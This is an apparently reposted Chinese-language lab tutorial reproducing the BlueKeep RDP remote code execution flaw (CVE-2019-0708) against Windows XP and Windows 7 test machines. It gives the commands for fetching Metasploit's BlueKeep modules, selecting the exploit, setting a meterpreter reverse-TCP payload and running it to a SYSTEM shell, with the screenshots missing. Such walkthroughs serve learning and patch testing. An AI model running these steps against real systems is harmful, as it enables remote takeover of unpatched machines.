CVE-2019-0708漏洞復現


windows RDP遠程代碼執行_CVE-2019-0708漏洞復現

一、漏洞概述

2019年5月14日微軟官方發布安全補丁,修復了windows遠程桌面服務的遠程代碼執行漏洞,該漏洞影響了某些舊版本的Windows系統。此漏洞是預身份驗證且無需用戶交互,這就意味着這個漏洞可以通過網絡蠕蟲的方式被利用。利用此漏洞的任何惡意軟件都可能從被感染的計算機傳播到其他易受攻擊的計算機。

二、漏洞影響版本

Windows 7

Windows server 2008 R2

Windows server 2008

Windows 2003

Windows xp

注:Windows 8和windows10以及之后的版本不受此漏洞影響

三、漏洞環境搭建

目標機:windows xp  IP:192.168.45.135

攻擊機:kali系統、\win7(安裝python3環境,安裝impacket模塊)

條件:目標機開啟3389端口,關閉防火牆

四、漏洞復現

1、 目標3389端口,關閉防火牆(或者在防火牆策略中放行3389端口)

2、 使用msf中相應的模塊驗證是否存在漏洞

2.1、升級msf版本

     apt-get update

     apt-get install metasploit-framework

     注意:不升級msf,使用msf v4版本加載第三方腳本,會報錯,可能只因為cve-2019-0708的腳本只兼容最新的msf版本(msf v5)

2.2、啟動msf,可以看到msf當前的版本

 

 2.3、搜索cve-2019-0708腳本

 

  2.4、使用腳本,設置參數

 

 

 

2.5、開始攻擊,下圖說明目標存在漏洞

 

 二、 0708最新payload復現。

環境:

目標機:win7 sp1 x64 IP:192.168.48.135    (開啟3389,關閉防火牆)

攻擊機: kali IP192.168.48  IP:192.168.48.138

 

1. 首先我們在github上下載最新的poc, 復制的時候如果目錄不存在 ,可以手動makedir

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

  

2. 更新我們的msf

更新以后使用reload_all重新加載0708rdp利用模塊

 

 

3.搜索關於0708的poc

4.     use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

  set payload windows/x64/meterpreter/reversr_tcp

 

 

5.  設置好IP

 

 

 

 

 

 

6. 設置好target為3

 

 

 

7.  多run幾次,就可以成功  我們也可以看到直接是system權限

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM